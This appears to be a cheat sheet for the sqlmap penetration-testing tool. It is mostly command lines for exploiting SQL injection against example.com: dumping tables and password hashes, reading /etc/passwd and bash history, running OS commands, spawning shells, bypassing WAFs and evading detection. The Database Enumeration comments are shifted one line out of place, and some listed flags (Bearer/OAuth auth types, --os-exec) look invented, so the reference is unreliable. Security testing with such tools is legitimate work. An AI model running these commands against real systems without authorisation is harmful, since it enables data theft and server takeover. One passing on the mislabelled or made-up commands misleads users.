sqlmap logo
SQLMap is an open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in web applications. It's a command-line tool that automates the process of identifying SQL injection flaws and can also be used to take over database servers. Designed for both beginners and experts, SQLMap offers extensive capabilities, including database fingerprinting, data extraction, and access to underlying file systems.

Installation and Setup

From Python (Recommended)

pip install sqlmap

From Source

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py -h

Using Docker

docker pull vulnerables/sqlmap
docker run -it --rm vulnerables/sqlmap -u "http://example.com?id=1"

From Package Managers

Kali Linux:
Pre-installed. Run directly with sqlmap.

Debian/Ubuntu:

sudo apt update && sudo apt install sqlmap

Updating SQLMap

git pull                              #From source
pip install --upgrade sqlmap          #Using pip

SQL Injection Testing Commands

sqlmap -u "http://example.com?id=1"                                                              #Basic Detection
sqlmap -u "http://example.com?id=1" --batch                                                      #Automated Mode (No Prompts)
sqlmap -u "http://example.com?id=1&search=apple" -p id                                           #Set a Specific Injection Parameter
sqlmap -u "http://example.com?id=1&category=2"                                                   #Multiple Parameters Testing
sqlmap -r request.txt                                                                            #Use a Request File (Burp Suite Export)
sqlmap -u "http://example.com" --level=5 --headers="User-Agent: ' OR 1=1 --"                     #Inject in HTTP Headers
sqlmap -u "http://example.com?id=1&search=apple" --cookie="PHPSESSID=xyz123"                     #Inject with Session Cookies
sqlmap -u "http://example.com?id=1" --method=POST --data="username=admin&password=1234"          #POST Method Injection
sqlmap -u "http://example.com?id=1" --headers="Content-Type: application/x-www-form-urlencoded"  #Custom Content-Type Header
sqlmap -u "http://example.com?id=1" --timeout=30                                                 #Set Connection Timeout
sqlmap -u "http://example.com?id=1" --time-sec=10                                                #Set Time-Delay for Blind SQL Injection
sqlmap -u "http://example.com?id=1" --max-retries=5                                              #Set Maximum Retries on Failed Connections

Authentication Techniques

sqlmap -u "http://example.com" --auth-type=basic --auth-cred="admin:password"                                        #Basic HTTP Authentication
sqlmap -u "http://example.com" --auth-type=digest --auth-cred="user:password"                                        #Digest Authentication
sqlmap -u "http://example.com" --auth-type=ntlm --auth-cred="DOMAIN\user:password"                                   #NTLM Authentication
sqlmap -u "http://example.com" --cookie="PHPSESSID=xyz123"                                                           #Session Cookies
sqlmap -u "http://example.com" --headers="X-Forwarded-For: 127.0.0.1, Referer: http://example.com"                   #Custom Header Injection
sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080" --proxy-auth="user:password"                          #Proxy Authentication
sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor                                                   #Using the Tor Network
sqlmap -u "http://example.com" --auth-type=Bearer --auth-cred="Bearer <token>"                                       #Bearer Token Authentication
sqlmap -u "http://example.com" --auth-type=OAuth --auth-cred="OAuth2 <token>"                                        #OAuth2 Authentication
sqlmap -u "http://example.com" --auth-type=Custom --auth-cred="apiKey=<key>"                                         #Custom Authentication using API Keys
sqlmap -u "http://example.com" --cookie="sessionid=xyz; user=admin" --auth-type=basic --auth-cred="admin:password"   #Combined Session Cookie and Basic Auth

Database Enumeration

sqlmap -u "http://example.com?id=1" --roles                                                                     #List Available Databases
sqlmap -u "http://example.com?id=1" --dbs                                                                       #List Tables in a Specific Database
sqlmap -u "http://example.com?id=1" -D database_name --tables                                                   #List Columns in a Table
sqlmap -u "http://example.com?id=1" -D database_name -T table_name --columns                                    #Dump Data from a Table
sqlmap -u "http://example.com?id=1" -D database_name -T table_name --dump                                       #Dump Data with Conditions
sqlmap -u "http://example.com?id=1" -D database_name -T table_name --dump -C username,password --where="id>10"  #List Database Users
sqlmap -u "http://example.com?id=1" --users                                                                     #Crack User Passwords
sqlmap -u "http://example.com?id=1" --passwords                                                                 #Get Database Roles
sqlmap -u "http://example.com?id=1" --privileges -U username                                                    #Check Privileges of a User
sqlmap -u "http://example.com?id=1" --search="email"                                                            #Search for Specific Data in a Table
sqlmap -u "http://example.com?id=1" -D database_name -T users --dump --threads=10                               #Dump Data with Multiple Threads
sqlmap -u "http://example.com?id=1" --os-shell                                                                  #Get an Interactive Shell After Database Enumeration
sqlmap -u "http://example.com?id=1" --time-sec=5                                                                #Delay Between Requests to Evade Detection

Injection Techniques

sqlmap -u "http://example.com?id=1" --technique=BEUST                      #Specify Injection Techniques (B: Boolean-based, E: Error-based, U: UNION query-based, S: Stacked queries, T: Time-based blind)
sqlmap -u "http://example.com?id=1" --risk=3 --level=5                     #Specify Risk and Level (Max Risk = 3, Max Level = 5)
sqlmap -u "http://example.com?id=1" --fingerprint                          #Fingerprint Database
sqlmap -u "http://example.com?id=1" --prefix="' OR " --suffix="--"         #Set Payload Injection Points
sqlmap -u "http://example.com?id=1" --technique=E                          #Use Error-based Injection Only
sqlmap -u "http://example.com?id=1" --technique=U                          #Use UNION-based Injection Only
sqlmap -u "http://example.com?id=1" --technique=ST                         #Use Stacked Queries Only
sqlmap -u "http://example.com?id=1" --technique=BT                         #Use Boolean and Time-based Injection

#Techniques:
B: Boolean-based blind
E: Error-based
U: UNION query-based
S: Stacked queries
T: Time-based blind

sqlmap -u "http://example.com?id=1" --random-agent                        #Randomize User-Agent
sqlmap -u "http://example.com?id=1" --proxy="http://127.0.0.1:8080"       #Use Proxy During Injection

File and Operating System Access

sqlmap -u "http://example.com?id=1" --file-read=/etc/passwd                                        #Read Files from the Target Server
sqlmap -u "http://example.com?id=1" --file-write=/path/to/local/file --file-dest=/path/on/server   #Write Files to the Target Server
sqlmap -u "http://example.com?id=1" --file-search=password                                         #Search for Files on the Server
sqlmap -u "http://example.com?id=1" --os-cmd="whoami"                                              #Run OS Commands
sqlmap -u "http://example.com?id=1" --os-shell                                                     #Get an Interactive Shell
sqlmap -u "http://example.com?id=1" --os-pwn                                                       #Execute OS Privilege Escalation
sqlmap -u "http://example.com?id=1" --os-exec="/bin/bash -i"                                       #Execute Commands in a Shell
sqlmap -u "http://example.com?id=1" --file-read=/home/user/.bash_history                           #Read Bash History File
sqlmap -u "http://example.com?id=1" --os-cmd="cat /proc/version"                                   #Fetch System Information
sqlmap -u "http://example.com?id=1" --os-cmd="ps aux"                                              #List Running Processes

Output and Logging

sqlmap -u "http://example.com?id=1" --output-dir=/path/to/output   #Save Output to Directory
sqlmap -u "http://example.com?id=1" --dump-format=json             #Set Output Format
sqlmap -u "http://example.com?id=1" -v 3                           #Verbose Logging

Verbose Levels:
0: Quiet (no output)
1: Basic Information
2: Progress Indicators
3: Debugging

sqlmap -u "http://example.com?id=1" --batch                        #Run Automatically Without Prompts
sqlmap -u "http://example.com?id=1" --save                         #Save the State of the Session for Later Resumption
sqlmap -u "http://example.com?id=1" --flush-session                #Flush the Current Session and Restart
sqlmap -u "http://example.com?id=1" --disable-color                #Disable Colored Output for Logging
sqlmap -u "http://example.com?id=1" --log="output.log"             #Save Detailed Logs to a File

Tampering and Bypassing WAFs

sqlmap -u "http://example.com?id=1" --tamper=space2comment              #Use a Tamper Script
sqlmap -u "http://example.com?id=1" --tamper=space2comment,randomcase   #Combine Multiple Tamper Scripts
sqlmap -u "http://example.com?id=1" --user-agent="Mozilla/5.0"          #Custom User-Agent
sqlmap -u "http://example.com?id=1" --random-agent                      #Randomize User-Agent
sqlmap -u "http://example.com?id=1" --delay=2                           #Throttle Requests
sqlmap -u "http://example.com?id=1" --tamper=between,randomcase         #Use Additional Tamper Scripts
sqlmap -u "http://example.com?id=1" --referrer="http://example.com"     #Custom Referrer Header
sqlmap -u "http://example.com?id=1" --no-cast                           #Disable Auto-CAST for Payloads
sqlmap -u "http://example.com?id=1" --tamper=apostrophemask             #Tamper Script for Masking Apostrophes

Real-World Examples

sqlmap -u "http://example.com/login" --data="username=admin&password=1234" --dbs                            #Test Login Form for Injection
sqlmap -u "http://example.com?id=1" --batch --dump --threads=10                                             #Dump All Data in the Fastest Way
sqlmap -u "http://example.com?id=1" --passwords --threads=5                                                 #Enumerate and Crack All Passwords
sqlmap -u "http://example.com?id=1" --proxy="http://127.0.0.1:8080" --tamper=space2comment --random-agent   #Bypass a WAF Using Proxies and Tamper Scripts
sqlmap -u "http://example.com?id=1" --random-agent --delay=5 --level=1 --risk=1                             #Run as Stealthily as Possible
sqlmap -u "http://example.com/login" --data="username=admin&password=1234" --os-cmd="ls"                    #Test for OS Command Injection
sqlmap -u "http://example.com?id=1" --dbs --batch --no-cast                                                 #Get Databases in One Shot with No Auto-CAST
sqlmap -u "http://example.com?id=1" --flush-session --threads=10                                            #Use Multiple Threads and Flush Session Before Running